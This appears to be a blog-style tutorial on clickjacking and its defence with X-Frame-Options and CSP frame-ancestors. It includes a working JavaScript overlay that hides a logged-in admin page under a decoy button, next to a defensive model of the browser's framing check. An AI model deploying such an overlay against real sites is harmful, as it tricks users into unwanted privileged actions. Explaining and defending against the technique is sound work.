
What is clickjacking
In simple words, clickjacking means that a user is tricked into clicking or typing on a different site or page than the one they believe they are interacting with. The attacker's page loads the real site, usually in an invisible iframe, and lines it up with decoy content of his own, so the user's clicks land on the real site, with the user's own session and privileges.
Why is that a problem from a security point of view? Here is an example.
An example of Clickjacking
Let's assume you own a website, my_domain.com, and log in to it every day. If the site is not protected against clickjacking, an attacker can load it in an iframe on a page hosted on a domain he controls, say some_domain_owned_by_hacker.com.
The attacker also adds some JavaScript to his page that records keystrokes. Note what this script can and cannot see: the browser's same-origin policy prevents it from reading anything typed into the cross-origin iframe, so it only captures what is typed into the attacker's own page. The framed copy of your site is there to make the page look genuine, because it renders your real content; the attacker places his own input fields where your login form appears to be.
Through some means the attacker tricks you into opening this page. If you do not notice the domain name in the address bar, you may believe it is your own website and try to log in.
Because the login field you typed into belongs to the attacker's page, his keystroke-recording script now has your password.
You may object that you always check the domain name before doing anything on a website, and all the more so when it is your own. Is this still a problem?
Remember that the attacker can target other administrators of your site, who may not be as careful as you are, and the same goes for your ordinary users.
Further to this
Let's assume you are already logged in to your website, so your browser holds a valid session cookie, and the attacker tricks you into clicking some button on his page. He places the iframe of your site over that button, made transparent, and positions it so that an administrative control on your site sits exactly where the decoy button is. Your click goes to your own site, which performs the administrative action with your privileges because the request carries your existing session. No password is captured and nothing is typed; a single click on a link or button is enough.
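The overlay described above, as an added example that is not code from the original post: the attacker's page builds the decoy button and the transparent iframe with plain DOM calls. The victim URL, the coordinates of the target button inside the victim page and the decoy text are all assumptions made for this illustration; the `fakeDocument` stand-in exists only so the function can be exercised outside a browser.

```javascript
// Added example, not from the original post: the attacker page from the scenario
// above, built with DOM calls so it can be dropped into any HTML page on
// some_domain_owned_by_hacker.com. Victim URL, target-button coordinates and the
// decoy text are assumptions for illustration.

function buildOverlay(doc, targetUrl, opts) {
  const {
    left = 200, top = 150,          // where the decoy button appears on the attacker page
    targetX = 600, targetY = 300,   // where the real button sits inside the framed victim page (assumed)
    width = 160, height = 40,
  } = opts || {};

  // 1. The decoy: what the victim believes they are clicking.
  const decoy = doc.createElement('button');
  decoy.textContent = 'Claim your reward';
  Object.assign(decoy.style, {
    position: 'absolute', left: `${left}px`, top: `${top}px`,
    width: `${width}px`, height: `${height}px`, zIndex: '1',
  });

  // 2. The victim site in an iframe. The browser loads it with the victim's own
  //    cookies, so the framed page is already logged in. It is shifted so that the
  //    real button lands exactly over the decoy, and made fully transparent: an
  //    element with opacity 0 is invisible but still receives the click.
  const frame = doc.createElement('iframe');
  frame.src = targetUrl;
  Object.assign(frame.style, {
    position: 'absolute',
    left: `${left - targetX}px`,         // (left - targetX) + targetX === left
    top: `${top - targetY}px`,
    width: '1200px', height: '800px',    // large enough to contain the target button
    opacity: '0',
    border: '0',
    zIndex: '2',                         // stacked above the decoy, so it gets the click
  });

  doc.body.appendChild(decoy);
  doc.body.appendChild(frame);
  return { decoy, frame };
}

// Minimal stand-in for the DOM so the function runs outside a browser (constructed).
function fakeDocument() {
  const appended = [];
  return {
    appended,
    createElement: (tag) => ({ tag, style: {}, textContent: '', src: '' }),
    body: { appendChild: (el) => appended.push(el) },
  };
}

// Constructed target: an administrative action on the victim site (assumed path).
const TARGET_URL = 'https://my_domain.com/admin/users/delete?id=42';
const built = buildOverlay(
  typeof document !== 'undefined' ? document : fakeDocument(),
  TARGET_URL,
  { left: 200, top: 150, targetX: 600, targetY: 300 },
);
```

In a real browser, loading this script on the attacker's page is all it takes: the victim sees a button labelled "Claim your reward", but the element that actually receives the click is the framed, logged-in admin page of my_domain.com. The attack fails only if the browser refuses to render my_domain.com inside the frame, which is exactly what the header in the next section arranges.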
Solution to prevent clickjacking using X-Frame-Options
The fix is simple. For Apache with mod_headers enabled, add the following to your .htaccess file (or to the virtual host configuration):
    <IfModule mod_headers.c>
        Header always append X-Frame-Options SAMEORIGIN
    </IfModule>
The header does not make the server check anything; it is an instruction to the browser. With SAMEORIGIN, the browser renders the page inside a frame only when every ancestor frame, up to the top-level page, has the same origin as the page itself; otherwise it refuses to display it, and the frame on some_domain_owned_by_hacker.com stays blank. DENY forbids framing altogether, which is the safer choice if your site never frames its own pages. A few practical notes: "always" makes Apache add the header on error responses (4xx, 5xx) as well, not only on successful ones; "Header set" is usually preferable to "append", because "set" replaces any X-Frame-Options value your application may already send, whereas "append" joins the values with a comma and browsers refuse to render a page whose X-Frame-Options carries conflicting values; the older ALLOW-FROM option is not supported by current browsers, so if a specific third-party site must be allowed to frame you, use the Content-Security-Policy frame-ancestors directive instead, which browsers honour in preference to X-Frame-Options when both are present. After deploying, confirm the header is actually emitted with curl -I https://my_domain.com/ and look for the X-Frame-Options line in the output.
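To make the browser-side decision concrete, here is an added example (not from the original post) that models how a browser decides whether a response may be rendered inside a frame, following the X-Frame-Options steps in the HTML Standard plus a simplified Content-Security-Policy frame-ancestors match. Origins are plain strings such as "https://my_domain.com"; the header sets used to exercise it are constructed for illustration. It also shows what the "append" caveat above means in practice.

```javascript
// Added example, not from the original post: a model of the browser's framing check.
// headers: object keyed by lowercase header name.  ancestorOrigins: origins of the
// framing documents from the immediate parent up to the top-level page.

function parseXfo(headerValue) {
  // Multiple X-Frame-Options headers arrive joined with commas (this is what Apache's
  // "Header append" produces); the browser splits, trims and lowercases them into a set.
  return new Set(
    headerValue.split(',').map((v) => v.trim().toLowerCase()).filter((v) => v !== ''),
  );
}

function frameAncestorsAllow(sourceList, responseOrigin, ancestorOrigins) {
  // Simplified CSP source matching: 'none', 'self' and literal origins only.
  const sources = sourceList.trim().toLowerCase().split(/\s+/);
  if (sources.includes("'none'")) return false;
  // Every ancestor up to the top-level document must match some source.
  return ancestorOrigins.every((anc) =>
    sources.some((src) => (src === "'self'" ? anc === responseOrigin : src === anc.toLowerCase())),
  );
}

function framingAllowed(headers, responseOrigin, ancestorOrigins) {
  if (ancestorOrigins.length === 0) return true;   // top-level navigation, nothing to check

  const csp = headers['content-security-policy'];
  if (csp) {
    const directive = csp.split(';').map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      // When CSP carries frame-ancestors, X-Frame-Options is ignored entirely.
      return frameAncestorsAllow(directive.slice('frame-ancestors'.length), responseOrigin, ancestorOrigins);
    }
  }

  const xfo = headers['x-frame-options'];
  if (xfo === undefined) return true;               // no header: any site may frame the page

  const values = parseXfo(xfo);
  if (values.size > 1) {
    // Conflicting values: if any of them is a recognised keyword the browser refuses
    // to render the page at all; if none is recognised the header is ignored.
    return !['deny', 'allowall', 'sameorigin'].some((k) => values.has(k));
  }
  const [value] = values;
  if (value === 'deny') return false;
  if (value === 'sameorigin') {
    // Every ancestor, not just the direct parent, must be same-origin with the response.
    return ancestorOrigins.every((anc) => anc === responseOrigin);
  }
  return true;   // "allow-from" and unknown tokens are not enforced by current browsers
}

// Constructed scenario from the post: the victim site framed by the attacker's page.
const VICTIM = 'https://my_domain.com';
const ATTACKER = 'https://some_domain_owned_by_hacker.com';
const unprotected = framingAllowed({}, VICTIM, [ATTACKER]);                                   // true
const sameOrigin = framingAllowed({ 'x-frame-options': 'SAMEORIGIN' }, VICTIM, [ATTACKER]);  // false
```

The last two lines reproduce the post's before and after: without the header the attacker's frame renders, with SAMEORIGIN it does not. The nested case (your site framed by your own page, which is in turn framed by the attacker) is also blocked, because every ancestor is checked.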
For more information read Clickjacking – OWASP